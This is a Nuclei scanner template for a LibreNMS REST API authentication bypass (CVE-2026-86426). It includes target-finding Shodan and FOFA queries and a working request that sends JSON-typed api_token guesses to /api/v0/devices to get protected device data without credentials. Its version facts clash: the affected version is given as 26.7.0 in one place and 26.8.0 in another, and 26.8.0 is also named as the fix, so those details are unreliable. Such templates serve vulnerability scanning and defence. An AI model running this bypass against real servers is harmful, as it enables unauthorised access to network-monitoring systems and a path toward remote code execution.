漏洞描述
LibreNMS <= 26.8.0 contains an authentication bypass caused by MySQL type coercion in the REST API token validation, letting unauthenticated attackers access protected endpoints and execute remote code via alert templates.
id: CVE-2026-86426
info:
name: LibreNMS <= 26.7.0 - Unauthenticated API Access
author: 0x_Akoko
severity: critical
description: |
LibreNMS <= 26.8.0 contains an authentication bypass caused by MySQL type coercion in the REST API token validation, letting unauthenticated attackers access protected endpoints and execute remote code via alert templates.
impact: |
Unauthenticated attackers can access protected API endpoints and execute remote code, leading to full system compromise.
remediation: |
Update to version 26.8.0 or later.
reference:
- https://github.com/librenms/librenms/security/advisories/GHSA-cvq8-gqfq-3mvg
classification:
cvss-score: 9.2
cwe-id: CWE-287
metadata:
verified: true
max-request: 11
vendor: librenms
product: librenms
shodan-query: http.title:"LibreNMS"
fofa-query: title="LibreNMS"
tags: librenms,auth-bypass,type-confusion,api,unauth
flow: |
if (http(1)) {
var guesses = [[0], 1, 2, 3, 4, 5, 6, 7, 8, 9];
for (var i = 0; i < guesses.length; i++) {
set("guess", JSON.stringify(guesses[i]));
if (http(2)) break;
}
}
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
redirects: true
max-redirects: 3
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(tolower(body), "librenms")'
condition: and
internal: true
- raw:
- |
GET /api/v0/devices HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"api_token":{{guess}}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "json")'
- 'contains_all(body, "\"status\"", "\"ok\"", "\"devices\"")'
condition: and
# digest: 4a0a00473045022029c1fd64a3c709c8f706a0055b32bdb0ce8e61e4b09bb8debfb7d8edeac0a25e022100e84ed6a48b9c364ac97bc1406d038d005b496afa275bc3a69b24ef8108ec2176:922c64590222798bb761d5b6d8e72950